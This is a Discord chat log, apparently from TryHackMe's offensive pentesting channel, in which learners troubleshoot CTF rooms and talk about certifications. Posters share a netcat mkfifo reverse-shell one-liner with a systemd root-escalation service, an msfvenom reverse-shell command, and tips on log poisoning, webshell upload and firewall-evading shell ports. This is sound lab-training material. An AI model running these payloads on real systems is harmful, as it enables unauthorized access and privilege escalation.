#offensive-pentesting-path

Obv not legit real world experience but it can give the employer a piece of mind knowing u actually do hands on stuff with all that u learn and obv u can validate ur knowledge in an interview

Not sure if my previous work experience is very relevant lol but ive been learning as much as i can this past year, trying to gain a clearer perspective on the opportunities out there

Yea theirs no doubt youll be able to switch. If anything, do research on some job roles that you find interest in, look at their roles/job descriptions, and most job descriptions overlap in what they are looking for or want u to do so thats good. But if most entry level job roles u want to go for keep saying “preferred: security +...” etc, than get that one cert, start learning some stuff that accompanies the job roles if u dont really know em well enough and apply

i needed the ip of the box. that's why i asked from the beginning but you didn't get what i was talking about.

in port scanner doesn't show up.

guys which cert do you suggest me to go first?

oscp,ceh,comptia+?

Hi, How do you guys get the ip of the machines that are at locked screen ? Blue for example, I'm trying to do it again without loggin in to it, and loks like the network card is sleeping or smething like that. or is couse the windows license is expiring ? I need to know if can be done without loggin in to it,

I'm talking about the offline machines,

Got it. My bad, I had to change the network card setting in vbox to be in same network 😄

hey all, I had a quick question on the Kenobi room Task 2. The last question talks about the rpcbind port that was discovered previously during recon. Then it goes on to say "In our case, port 111 is access to a network file system." How would I know that outside of this room? Is it just because we see Samba running on other ports that we assume the rpcbind port has a NFS backend?

The nmap scan was able to fingerprint it

cool, thanks!

Hi Guys, I'm trying to git clone Kerbrute tool.
But mo Internet on the Host... what can I do?

Why do you need it on the host?

Hey guys!!! Been having an issue with the very end of Steel Mountain. Ran everything exactly to the T. But no luck. Looked at many other forums, write ups but nothing.

I’m not using metasploit.

Refuse to

@buoyant zinc are u throwing ur executable into the directory before the “Advanced..” I believe and starting and stopping service in that same directory?

Yes

I stop —-> put the executable——> then start.

Put the exe than do stop and atart

Thanks you btw.

Ok I will do that. Thank you! I will let you know what happens. I need to hit the hay.

Aye no problem, welcome!

@fleet wedge Yeah no luck with inputting the exe first and then stop/start the service.

I will continue to search and retrace my steps

I might put a different port within the payload.

so how would you guys go about taking a disk image of a whole machine? lets say I have full root privileges and want to look at the machine locally so there is no way of me doing any damage to the machine. (a Linux machine)

I am trying to do the Buffer Overflow Prep room but cannot connect to the machine with xfreerdp. It just gives me a black screen for a couple of seconds then the window closes and it says Network disconnect in the CLI!

@ebon dome you could use clonezilla boot up disk or, even dd

Have you ever tried nomachine or dwservice? I honestly don't know what is the easiest for ctf/pentest work.

TBH, I haven't really compared these against one another. I just know wanted to give some options.

Hi, I'm in the Internal room, i've got credentials of the admin page and got a reverse shell as www-data, but i don't know how do move forward, any tips? Also, I've got a couple of credential of phpmyadmin, but I don't think is the right path...

keep enumerating the filesystem for interesting files. linpeas or linux-smart-enum should help you find something interesting

So what's going on there? Just boxes in a couple different websites to help with oscp?

Yes?

It's like, software - box

Ah ok. Yea just making sure

hi

@turbid crest that is the list of boxes and challenges I did in place of the PWK labs.

@rancid vine whats wrong with the pwk labs? Or nothing and just extra resources?

I didn't find the PWK experience to be of much benefit. So I found things that were.

Except you have to buy them, so eh

Hi, is there anyone who can unblock me here. I always seem to get this issue when attempting to get a shell. I have looked everywhere and even had to reinstall my kali. Thanks in advance

That local IP looks... wrong?

@near ginkgo I’m blocked in a sense that I can’t move beyond this point . Unable to complete my rooms

@covert scarab was following some write up, this is an ip I got from the machine I spun up

uhhh

wut

wut no

It's clearly the wrong local IP

@near ginkgo will do

bruh

I give up

I'm outta here

ifconfig is deprecated

Not only that but I said it's the wrong local IP so "showing it's the wrong local IP" is already out of the question

@near ginkgo

thanks a lot, much appreciated!!

yeeep, totally agree

now I know better

an interviewer just asked me an extremely weird question

whats the first command i would type to ensure that my reverse php shell is working properly....

is there a right answer for this? i usually just do ls.....

Ask #infosec-general here.

uname will tell u the info about the machine it's being run on

while i appreciate the advice, i was asking not because i didn't know these commands and could only say ls.

That’s a wack question

The question is likely to test whether someone checks their situational awareness when it comes to initial access to a target, or pivoting to a subsequent endpoint.

Need some help with /room/gamezone
can i dm anyone?

fixed ^^

wait u gotta pay for the labs on top of the cert or no?

No

You can't buy the cert without getting the whole PWK

The question by itself doesn’t provide enough context to have a definitive answer, but I would say ‘id’ or ‘hostname’. These will confirm right away you’re on a different system.

Hey can anyone help me in bypassing php filter? I am uploading a webshell but the server is commenting my php code

different people have different ways to confirm that the shell worked imo

look at my pm july

Reading up on different scanning methods currently as part of my courses and rooms. Curious to hear how you lot do nmap or rustscan, what flags, how to do firewall/IDE bypass, remain stealthy etc.

What room are you doing on TryHackMe?

Finished Linux and Networking fundamentals, currently working my way through web hacking funcamentals

this great room may answer some of your questions.

https://tryhackme.com/room/furthernmap

Reading about nmap -sS flag for example, which in reality is not stealthy at all

thats interesting. So why is not stealthy?

I should rather say, -sS by itself is not stealthy. You're still sending ICMP packets (SYN packet) to a host, and if you're sending that rapidly to all ports on an IP address, that should be easy to spot for modern IDEs. Maybe 20 years ago -sS was stealthy, but surely that's not the case anymore?

So I'm assuming you would need a variety of flags and approaches. Like, scan with decoys, scan through a VPN, make packet sizes random, make the user header random, fit in with the general noise on the internet

ah i see that makes sense. Right basically use more flags and approaches like you said. Just need to "blend in"

At that point, shodan?

it really depends on how the environment is logging the requests, I have had been in environments where the syn is not logged but the rest of the handshake is

elaborate? io?

Indeed. Why scan over the internet if someone's already done it for you?

i know of shodan but have not really played with it. So shodan will scan the ports for you? and what type of search would you do to perform this

Shodan already has scanned the ports for you

any good sources to learn more on how to use shodan?

There's a room on it but it's private

Unless you're a student, you'll probably need to pay in order to get much use out of it

i pay for the upgraded membership, would i be able to access it?

trying to look for the room currently

the shodan room is being updated last I heard

oh ok ill keep an eye out for that

Private, not subscriber only

Oh ok thanks for the info

Hey, I've completed this path. How do I generate the Completion Certificate?

There is no certification for completing any path.

Ah, that's why. Alright, thanks.

Yes there is. It will say "Get Certificate"

Certificate of Completion that is...

well that is something new. you are right.

Sorry, I was wrong. In the right corner click on the Certificate button.

But I don't see it. I've completed the path.

Okay, I see it. Wasn't there in the morning when I finished it.

Weird.

Hi! anyone around that can help BOF. I keep running the sample python code and the program keeps crashing on the first 100 mb which is strange...

Hi guys. How long the discount last if i complete the comptia pentest path?

Until the end of the year

Thanks mate

Still need help ?

Did you figure that one out? I am seeing the same thing

I do if you are around

is this the right result for fuzzer.py? How many bytes do we know were sent?
Fuzzing with 100 bytes
Could not connect to 10.10.173.38:1337

No it's not

You have to run the exe in the debugger first and then to run the fuzzer in the attacker machine

@sturdy flame

yes got that far

I'm not getting this in the !mona findmsp - distance xxx

EIP contains normal pattern : ... (offset XXXX)?

should that be in the output of the log data?

got it..

Hey not sure if this is the right channel, but can someone help if I've done something wrong here? I am doing the Blue room. When i do the metasploit exploit it always fails, output is attached

Can you screenshot it instead please?

and screenshot the output of show options

yup

1

2

options

there

LHOST is wrong

set it to your VPN IP

ah i had a lingering feeling that was the case

thanks

yesss all sorted, thanks again

You ok now ? ;)

kinda..

Can someone help with a fuzzer question?

I recommend just asking directly

Fuzzing with 1267 bytes
Fuzzing with 1268 bytes
Could not connect to 10.10.178.212:1337

when it hits 1268,. THAT is the offset right?

You're using python2 right?

would that make a difference?

Yes, python3 handles raw bytes and some network stuff totally differently

hm

Many people have stuck with python2 for it because it's considerably easier

If you're using the script provided in the room, it's python2

so is that why it has been ioncosistent

ok thanks, been racking my brain on why it changed in a few attempts

same with the exploit.oy?

Yeah there's a reason people stick with 2 for BoF stuff

i got the same offset this time. then searching for the EIP in mona with 1268 + 400 doesn't show the EIP offset in the application

figured it out, my mistake

thanks for the python2 advice

Use
python fuzzer.py

Unless you're on the attackbox

Then use python2.7 fuzzer.py

Aaah

I thought he used the script of the room

I finally got he process. It was a bit confusing with the offset for the explloit.py

Huh?

That script was written for python2

python happens to be python3 on some systems

Which you need to remember. That includes the attackbox

its never mentioned to use python2

I didn't said that due to the command itself

I said it due to the output

I used kali 2020

As i remember the room there count 100 per 100

yea

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Error: One or more options failed to validate: LHOST, LPORT.

hi guys, anyone ever experienced the above, trying to create a shell using msfvenom

sorted

May I ask your intentions? This sounds very specific

Anyone who took the OSCP, is Linux Buffer Overflows on the exam?

you could run into anything. discussing topics that are on the exam is against offsecs rules so i'm gonna have to ask you to stop here. please don't try fishing for exam specifics.

ok thanks!

I'm doing DailyBugle and the website isn't loading, but it is there and I got a screenshot of the frontpage through autorecon. I am very confused.

Do I need a hostname in my hosts file for the site? Or do I need to use a certain browser.

Gobuster etc is enumerating directories too and getting some 200s, but I still can't physically view the page.

Do you have a proxy turned on?

Hi all, currently doing Internal and can't seem to capture any traffic in burp/zap after settings up the ssh port forward to my localhost. Not sure what's happening here.

i have a problem of downloading this path's certificate

in the cert my nickname is written instead of my full name

The intercept was on when I tried last night, although it works fine when I close the ssh session. I'll try foxy proxy when I get home to see if this helps.

hi everyone, anyone have problems with the BoF of brainstorm? I have success when I reproduce locally the exploit, but not success on the deployed machine :c anyone in the same situation?

Just got home, froxy proxy works like a charm! Thanks again.

just finished relevant room but it seems i exploited it not the intended way as in the walkthrough

There's an unintentional if you know how to do more than just fire the default eternal blue at it.

I had a hard time trying to prevent that with the way the box is built.

That's if you went that route anyways. I note that it exists in the room.

yea it took me alot of time that room 2 days to be exact really nice one kudos to you still have a lot to learn

So the offensive pentesting path is that oscp focused?

Yep

Cool thought so but just didn't see it stated like that :).

We can't call it OSCP path because it's copyrighted from offsec iirc or something like that but yea this is desired to be an OSCP path

actually that makes a lot of sense :D.

just finished my labtime on pwk... and not ready so will try and work through this path.

It's not just meant for OSCP either.

That's why it's named offensive pentesting path.

Just fried my brain doing 5 buffer overflows 😅

speaking of buffer overflows, can someone help me with a question regarding jumping to another register other than ESP?

Heellooo, is there anyone who escalated to system in alfred room without using metasploit

I have, have you figured this out yet or do you need help on this?

hi all

does internal too hard ?

What do you all usually use as your first nmap command, considering you want to scan all ports? I am trying to look for a scan that will find me 95 percent of the information of a host (open ports, services, OS) but that also doesn't take me half an hour to run😂, any suggestions?

Anybody able to answer a query on steel mountain?

It's always best to ask directly. Otherwise, people don't know if they can help straight away so they're less likely to engage.

Well basically. I was wondering when i use Powerup.ps1 on the machine. my enumeration scan is missing the "Can restart" field. Every other field is present.

so had to manually try stop/restart each service instead of using the info from powerup.ps1 to check if i had access

I think other people have had that too ¯\_(ツ)_/¯

makes sense, I was just wondering, as I see more and more services on non standard ports that nmap would not find in the standard 1000 ports.

nmap -sV -v -p-

You get the ports back straight away, so you can carry on recon

As soon as they're found

Something like rustscan will find them faster

Never Heard of rustscan before, now reading up on it. Looks cool, do you prefer it over nmap? Or are there certain use cases in which you prefer one or the other?

I don't tend to use rustscan

Threader3000 first. It runs -sC -sV on the ports it found.

Easy to install. Just run pip3 install threader3000

Run it wherever you want to save the output. It outputs as an XML that you can upload to Pentest.WS or wherever else. And I commented out a line that you can uncomment to allow xsltproc to convert your xml to html for web browser use if you prefer.

Someone suggest a web application pentester roadmap in thm.. starting from the beginner

The beginner path, then the webapp path

Is it necessary to know abt privilege escalation basics before getting into webapp path

You asked for webapp pentesting, correct?

Yes

Ok, and is privesc a part of webapps?

I think it's may be required to get root/admin access to a website

Well i don't know anything abt privilege escalation..

I think you're confused with what a webapp is.

Root is for Linux/Unix

That's not part of webapp.

Web app is just the webapp.

I mean to say like admin access...to all directiories in a web app

Including the hidden ones which cannot accesses by web scrapers..

That's not privesc

Or smtng like that

I really recommend starting with the true beginner path, and then asking again once you have the groundwork.

https://tryhackme.com/path/outline/beginner

Ohh...ok ..thanx ...i think i had to go with complete basisc for some more time..

Privilege escalation exists in web applications.

And yes, it can include gaining access to parts of the application where others are not authenticated to be.

Like all the directories.

@hoary oxide i sent u priv

It's most definitely not the same thing though. Same concept, at a very high level, but not the same.

I'm not the one that said it. Anyone pentesting knows that simply isn't true.

Gaining admin access is absolutely a part of web application privilege escalation, as yash had asked.

privilege escalation basics with no context, that's the problem

You don't need to learn what THM would classify as privesc basics if you're trying to do webapp privesc.

I just think it's unclear and bad advice. They were obviously asking about web stuff. Made suggestions about gaining admin access to web sites, directories, etc.

¯_(ツ)_/¯

What do I know.

Which bit was bad advice to you?

Following the complete beginner path?

yashvendraToday at 11:38 AM
I mean to say like admin access...to all directiories in a web app
[11:38 AM]
Including the hidden ones which cannot accesses by web scrapers..

NinjaJc01 | JamesToday at 11:38 AM
That's not privesc

That's a pretty good privesc in my opinion.

They also said root.

It's not the same as what THM teaches as privesc.

root/admin access to a website.

Feel free to give them better advice.

Rather than attacking me for it.

Learning the fundamentals will help all the way through.

@keen iris @rancid vine ..an query without a proper clarity from a noob(myself) leads to hard dusccussion b/w u guys ...sry for that...anyway tnx for helping me out..

so earlier this morning I provisionally passed the PenTest+ Exam. I have to give credit to the TryHackMe Team, as having access to this service was a critical component in gaining the necessary knowledge to go for this exam and pass it!

BoF Brainstorm, it is 64bits, so I tried to setup a windows machine and downloaded immunity. However, immunity is 32bit and complains about trying to open the file (chatserver.exe). How did you guys went about it?. I may tried working with x64bgr instead, but would mean that couldn't use immunity/mona for this like on previous exercises. Edit: the files were corrupted. I re-download them again and works fine.

Congrats on passing!!

thank you!!

Congrats @meager raft ! I gave you a shiny new Pentest+ badge 🙂

That's awesome, thank you very much for doing that @simple loom !

@meager raft good Job! I am taking the exam next week. Would you mind shooting me a dm with your opinion of the exam? Of course without violating the CompTIA rules on disclosures.

@hoary oxide @fleet wedge Hey guys, I would use your help with Alfred w/o Metasploit if you'd be willing

Dm me your question

Thanks a lot @hoary oxide. That was helpful!
Btw if anyone is looking, I have another way to get root flag W/O metasploit for Alfred 🙂

No problem man

any are facing same issue as i got 500 internal error

when acces to tryhackme.com

???

yes, as of 30 minutes ago the site started having issues according to the announcement, and I just got the 502 error.

so it looks like the site may be down for the time being

Check #announcements

Hi need a nudge on internal priv esc to root 😂

Forget tools. Enumerate manually.

Hmm i got user alr i did all the way manually

can someone link me the oscp banned tools list pls

Found this on their website, I would suggest doing further research: https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide

ok thanks

Hi all, currently doing Attacktive Directory and running into errors when using GetNPUsers.py. Not sure if this has happened to anyone else?

Try using GetNPUsers without the “python3” part should just run using the path

Same error, I even reinstalled the module it's asking for.

Oh install the requirements using “pip3 -r requirements.txt”

all statisfied already which is strange

hey guys, I am trying brainpan room and i'm a bit stuck after gaining a shell. After running linpeas there is sth ||that can be executable with sudo /home/anansi/bin/anansi_util|| . Am I in the correct path or should I look elsewhere? Also found ||some interesting group like adm and samba||. And tried || SUID|| but without success.

found it, sorry about the question

Gatekeeper room, i am having issue running the local file. I downloaded the gatekeeper.exe and put in a windows10 machine. I have immunity/mona plugin running from it. However, when I tried running gatekeeper.exe I get an error. I do have installed VS 2015 community issue, so it is not the vcruntime14.dll. Thus, I am unable to run it. How do you guy to ran it?

Heys guys, I can't find an answer on why an IIS windows server won't read a payload .asp but can read a .aspx ? I played around with msfvenom, but i can't find the documentation explaining this. Does anyone knows the difference?

you should run it on a win7 x86 sp1, in that way you should not have any problem. Remeber the program is made for a 32 bits OS.

Thanks, I'll give it a try.

you have to port forward from your vm to get a reverse shell to work right?

why would you have to do that?

How do you add OSCP tag to your name?

If you're thinking about the role, you ask a moderator when you are certified

be certified and kindly ask mods.

Already 🙂

Who is the person to ask ? 🙂

I just don't want to start DM'ing randomly 🙂

Thanks for help!

What is the name of the career role that is legally employed to find vulnerabilities in applications?
Does anyone know the answer?

@radiant oak that's a research question

Google is your friend here

ok i tried but i will look for more, because first i tried the easiest way kkkk

We are not here as a substitute for your own research

I know that I wasn't researching I was looking for help

It's a research question

You need to do your own research before asking for help.

ok it was badly boring, thanks for the attention.

^^^^^^^

i think that's related to almost everything in life in terms of sucess 😄

Hey everyone, transferred accesschk.exe to windows server 2012, but it ain't working. I've downloaded this one: https://web.archive.org/web/20111111130246/http://live.sysinternals.com/accesschk.exe which is supposed to work in older windows versions too. After transferring with smbserver, typing the following accesschk.exe /accepteula should normally be the first thing to type & after only typing accesschk.exe should show the syntax

but I get no output

it's the mr robot room

I'm not a big fan of automated tools, so trying to do everything as manually as possible & without checking any writeups

anybody have an opinion on where a novice like me should start learning to hack? i was told to start with CTF using tryhackme and hack the box but some of that looks like foreign to me. i am open to all suggestions

!docs free-path

This is the discord for tryhackme, after all

should i get a subscription then or is it even necessary ??

It's not a necessity

But it helps with box speeds and stuff

box speeds?

If you subscribe then your boxes deploy with more resources

So they boot faster and are faster

if if the machine im using is some what strong the box speeds can still be slow

?

Doesn't matter seeing as they're not on your machine

They're on AWS

They're not running locally

ok ill set it up and get started. thank you

THM is not only for ctf, you can also have amazing training in networks, linux, etc if you aren't into that yet 👍

Haven't done the linux rooms in THM, but they are also CTF-like, which is cool

ok ill look into that too! thank you !!

It all depends on what you mean by novice, but audit yourself on Networking, Linux, programming, web, etcm

I also consider myself a novice but I can handle myself pretty well on THM

should i just buy courses on them on udemy or just use youtube and other sm sites?

Just start. Do whatever you feel inclined to do, because you may not know a lot of things. Once you dived into the water for some time you'll know what to do next 👍

Do 1 week of research on the topics you like (If you like programming, research languages, their uses, where to learn it, etc.), and on week 2, start actually learning from what you condensed on week 1 (courses, books, TryHackMe, whatever your brain learns best)

If you don't know what "box speed" means then dive into Networking, Linux, Virtualization, that kind of stuff. It's not very complicated but it's a very IT slang

man i appreciate yall so much ! ill start there too

can anyone help me out here as to why i cant see contents of directory ?

Type shell then you'll be able to cd into the directory

Thanks 😄

can I dm @grave lion ?

sure

Hi guys I am new to pre much everything so bear with my silly basic questions

Could someone possibly help me determine my next steps on going from LFI to a shell? This is an area I struggle in and was hoping someone could help walk me through it.

did you check any of the guides on google already for that? something specifically not working?

Essentially, you could do with having a file that you can write to

Or another way of writing to files

Then, you include that file

The file will have PHP etc in it that will be executed when included

Log poisoning is a common one

Example right now I can run this; it then creates a download and I can read the contents.

I wanted to try log poisoning however the logs don't appear to be in the default locations.

Php filters can also help

can you find the configuration files?

they'll tell you where the logs are

or you can try /proc/self/fd/# where # is 1, 2, 3, 4, ...

Just finished the RootMe room. I got stuck on the last part, where I looked for SUID binaries. I read a writeup and saw that ||usr/bin/python|| was particularly interesting. Is that something you just have to learn and remember to look for next time? How would I know that that particular file was interesting out of every file listed? Are there other "obvious" files or paths I should look out for when searching for SUID bins?

mainly experience, anything that doesn't look right you can look up at https://gtfobins.github.io/

☠️✌🏻

@merry crater the lfi one is which room?

I think there is writeup

Hey guys!
I'm doing the steelmountain room and I'm having problems executing the AdvancedSystemCareService9 service.
For some reason I'm getting an: [SC] StartService FAILED with error 216.
Any Ideas?

check your nc @fleet wedge

@velvet tapir nothing in my nc

Try backing up and copy the file again,

Suppose in a CTF you are supposed to exploit a SUID/SGID file. You use find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null to locate all files with SUID/SGID bit enabled. Now, how do you filter non-exploitable results from possible ones ? Assuming using the said result with -h returns no version number for easy search.

@final stirrup you can try to make a whitelist like linenum.sh is using (variable binarylist https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh ) but you will still not see custom ones. You could also try to make a blacklist but you may filter wrong results. I wanted to do the same at first but at some point I just learnt to spot them little by little, too many special cases

What made it better for you in spotting them ? Coz that is kinda my end game to my methodology. At the moment SUID binaries that are not obvious are the last thing I look for and I would really like to reduce my time in filtering them but I am out of ideas. And I will look on your suggestion in Linenum. Thanks.

Yes to begin with just executing Linenum will show you the Linux binaries that are known to be vulnerable when the SUID bit is set, but it won't show you the custom ones (user created), so you'll still have to learn them a bit. When I began I made a list of my SUID binaries on my kali machine + the "normal" ones on a kali machine and I compared them. For the ones that were not in the list I used https://gtfobins.github.io/#+suid

Thanks. That indeed sounds smart. I too will make a note of this. Thank you very much.

For future reference make sure that you are typing the command correctly 😄
||msfvenom -p windows/shell_reverse_tcp LHOST=<Atacker IP> LPORT=<NC port> -e x86/shikata_ga_nai -f exe -o ASCService.exe||

Pentesting

How to start

!docs free-path

Same. WinPEAS has been impossible 2 times now. Not sure what I'm doing wrong

someone told me that maybe u should try to run the esp in the Desktop directory and make sure to be in executable permission . i dint try it yet but u can try this, if it work plz poke me i will be very thankfull

I'm not sure if it runs or not. It just breaks my reverse shell and it just hangs.

@tribal ferry if you want to paste commands use code blocks.

https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline-

@tribal ferry I think you downloaded the web page rather than the powershell code

Hi, I'm doing our offensive pentesting path, and I wonder, is this the OSCP path? I mean, is it specifically oriented towards the oscp?

I've read a couple reviews on "Tryhackme oscp path" but I think there isn't any specific path by THM

That's actually a good practice to double-check the exploits/scripts, so you're not running the html page of exploit-db haha

It's not OSCP specific, but it was created to help with certifications like it and eCPPT.

Guys I had a doubt about the 10% discount offered on Pentest+ on completing the path. For how long is the discount valid after completion of the path? I want to finish the path but don't plan to take the certification just yet

It won't expire til the end of the year

expires 31/12/2021

Hey there everyone!

happy to be here

What is the best way / path / roadmap to prepare for OSCP? I was looking around a bit and came across TheCyberMentors course (3 courses in a bundle: a) 'Practical Ethical Hacking - The complete course' b) 'Windows Privilege Escalations for Beginners' c) 'Linux Privilege Escalations for Beginners'.
Would this be recommended? Will it prepare me for the OSCP? Or should I rather choose another way? If so, which one? What experience have you had?

Is the OSCP at all suitable for an absolute beginner? Should I perhaps first take another certification?

The best way to prepare for the OSCP is to immerse yourself in as many lab environments as you can.

TCM's and Tib's Windows and Linux privesc rooms on the platform are great. As are their Udemy courses on the same instruction.

And what about the Practical Ethical Hacking course from TheCyberMentor (TCM ?)? Is that also recommended?

Yea. It's a really good course as well.

Ooh, I think I’ve got that saved on Udemy, glad people can recommend it

Alright. So I will get the complete Windows and Linux privesc, as well as Practical Ethical Hacking Bundle. Parallel to that a THM sub 🙂

But I'd recommend buying that directly from the actual TCM website 😄

Eep

But sure, I’ll have to have a look

The BUFFER OVERFLOW 2 --- is anyone getting no EIP when doing the attempted crash after the FUZZ testing ??? I'm at 700 - but I've gone up to 1100 --with no success -- even up to 3000 on the pattern create -- and cannot crash 2 at all ... ??? I'm following what I did on 1 yesterday and I finished that with no issues... Any suggestions ???

I figured it out --- I saw the difference in the EBP & EBX while looking at the ESP values and deducted that 4 bytes was needed to find the EIP... thanks reverse malware!

Alright

I hope someone here can assist me or point me in the right direction. I’m trying to do the blue room without meterpreter but I’m getting an impacket error

Install impacket?

For python2 I suppose

Yup

I believe so my python version is 2.7

You will have both

Ok so how do I get this working?

@keen iris

That looks cloned

Not installed

ok I believe I just installed it. I guess when it says master thats when its installed?

wat

ok

any hint for Internal? I got the reverse shell on server and am stuck now

Skip using tools for enumeration.

Anyone else just started this pathway 🙂

yeah

How you finding it?

I’m in buffer overflow, so far it has been awesome, specially internal and relevant, obscured was refreshingly at different angle,

Glad to hear you liked Internal and Relevant. 🙂

I admit to peeking at the writeups for those a little wee bit

I don’t feel bad for looking at write-ups bc I’m just learning

If I had sat through classes and then had supervised practice then I would try to not look at the help.

Try with -p- which scans for all pots instead of just "well known" ones

@pallid bison

I need help understanding a step in the kenobi room. How is it inferred that /usr/bin/menu is not using a full path?

If you RE the binary, you can find out that information

what do you mean by RE?

I need help understanding a step in the kenobi room. How is it inferred that /usr/bin/menu is not using a full path?
@stark remnant /usr/bin/menu is executing with full path. As ninja said you can Reverse Engineer the binary or executing it and looking for what it does would be the next step.

@mossy monolith Hint is "there is a reason why the room is called "internal" <---------

Does anyone know how to pull an entire site as one page? I found this page while studying for the OSCP: https://oscpnotes.infosecsanyam.in/ It seems pretty comprehensive. But, everything is an individual link, and I haven't found a way to download this as a document.

Or, archive it so this resource isn't lost forever...

Put the site name into archive.org and hit the button to archive it for you through the waybackmachine.

Will that archive all of the pages? Or, just the single page that I put in the 'save URL' field?

Nevermind, it looks like someone has already done this. Thanks for the help.

It will archive the entire site

You can use Curl to download the entire site.

hey everyone! I've been doing HackPark lately and it's been a while that I'm stuck at it's priv esc part. I'm running winPEAS.bat where I should be getting the running processes but it's output isn't covering all info neither is it covering abnormal services. Can anyone help?

@low knot so I just finished that one a little bit ago and got stuck at the same part...I'm not sure if maybe there was something wrong with the winPEAS.bat file or what but I ended up having to use the winPEAS.exe file instead.

Yeah i used that too but didn't find running processes there as well.

hmmm...i'm not sure then. the .exe gave me the running processes whereas the .bat didn't...

I am wondering what if similar flaws occur during certification exams.

I haven't gone through one yet myself but from what I've heard from the community, the cert exam stuff is a lot more stable and there's a proctor you can contact in real time for something like that.

that gives a sense of relief..lol

Had issues with that room too yesterday, could not execute the dam shell,

.\shell.exe

In the VulUniversity Lab, the last part where we create a environment variable using ($mktemp).service the next line is to edit this service file and insert the cat command but to do so we use the echo '[Service]. I understand that the single quote was used to continue using echo as a way of input but how does echo know which file to open? what does the [Service] mean?

what port did u use for netcat listener while u executed shell.exe?

9898

@low knot

echo basically means print , you are not editing the file , the first command is to rm remove the file, and then you create it again, the ' ' is a string of code, TF=$(mkdir).service ,,, it's declaring a variable, best I can do without google,

two separate paste::
1-
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f" > /tmp/shell.sh

2-
TF=$(mktemp).service

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash /tmp/shell.sh"
[Install]
WantedBy=multi-user.target' > $TF

/bin/systemctl link $TF
/bin/systemctl enable --now $TF

bruuhhh. First of all thank you so much for taking time and explaining it so nicely but I am so sorry I do not get it. I can't wrap my head around the first code. What is happening there? it's okay if you can't explain you can link me a resource, it would work too

It's a common reverse shell payload

So what we do with the 2nd code can be done with the 1st one too?

https://www.gnu.org/software/bash/

No.

The first one is a reverse shell payload, being put into a bash script file

The second creates your systemd service that will run it

You could just run that script, but you wouldn't become root because it'd just run as your current user

got it

Thanks man

Thanks thanks

I think u should try 4444/4445/1234 as well.......

If they don't work, then it seems a real issue.......

I mean, there are much better ports to use

yeah u should recommend them......i am myself a n00b afterall....lmao

443 or 53.

we're talking bout reverse shell here

r u talkin bout the same?

Yes

Because firewalls with restrictive outbound rules shouldn't block outbound to 443 or 53

alright then, 4444 worked for me btw

oh, that's informative!

The ideal is to use https or something, with 443

yeah exactly

We can listen on an already active port? or does those ports have to be inactive?

You can't listen on a (port+interface combination) that's already being used

So if you had something listening on 127.0.0.1:80, you can have something else listening on say.... 192.168.123.123:80

The escalating shell, I thought the issue was the command to execute. .\shell.exe Didn’t think the choice of port mattered, apparently it does, cool.

On the offensive path, Corp room. This room has a lot of things that are not working properly. I am not sure if it is on porpoise or not. For some I found a work around (like the start menu no working), but for others I can’t figure it out. Such as downloading the kereberoast powers he’ll file. It says it can’t connect to server. I tried different ways to download and from different locations but didn’t work. Same error.

The VM doesn't have internet access

So you need to host the file yourself

so are u done with priv esc part as well? Did winPEAS gave all the required output?

running processes especially...

Let me get back on that room,, since I’m curious about the port issue,

yeah, u should! I thought u're done solving the port issue...lol

Guys whenever hydra shows multiple incorrect passwords for one username then is it likely that there's some flaw in the command used or it sometimes does the same even if everything entered is right?

Means it can't detect the failure correctly, usually because your syntax isn't quite right

what a nice way of saying that, your hydra look good , maybe take the . off the error message, and from my notes like hint "while waiting on hydra and dirb decided to cat the files we got"

What you mean host the file myself?. I downloaded the file to my attack machine/Linux. Setup the web server and try downloading the file to the victim using powersell/downloadfile. Now that I think about it. I should try ssh or Netcat and see if I can get it hat way.

I downloaded the file to my attack machine/Linux. Setup the web server yes that's what I'm suggesting

removing . didn't make any change brother. Btw which files should we cat while waiting?

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP PIPELINING SASL AUTH-RESP-CODE UIDL CAPA RESP-CODES
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS post-login more have ID ENABLE capabilities SASL-IR IDLE OK Pre-login listed LITERAL+ LOGINDISABLEDA0001 IMAP4rev1
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

alright! admin might not be the username but I've made sure everything after http-post-form is correct. I hope I'm not missing something silly.😶

I'd help, but I despise squirrelmail brute force

actually i saw a different error message

I'd recommend using ZAP or burp if you can

yeah I have this opened in other tab.

yeah I'm using burp brother.

Fuzz it in burp, rather than using hydra

oh, I'll do that then

sorry got confused,,,, on hackpark is Login failed ,,, you are doing skynet

hydra should work ,,, once you get the correct syntax in ,

see, I've made the syntax with this stuff only.

anyways I'm fuzzing it in burp as well, just a min

in case u guys see any syntax error on the basis of above 2 ss, do let me know......

why ohh why did I go back to that ,,,, still can't get that second reverse shell to work,,,, did the initial one on port 53 , and the second one on 443,, I got it to hit once,,, but the shell wasn't built correctly,,,, and on the first shell, it gets hung up on like pwd,,,

c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>

what is that?

it's like running a for loop on pwd,,,

lol that happened to me as well but it got stable in 3rd-4th try I guess.

honestly, can't answer that 😆

cache indigestion

bro, it's too slow....shall take ages this way, gotta find other way round....

1. i aint your bro.
2. Zap is faster

1. oops sorry....

2. i shall try that

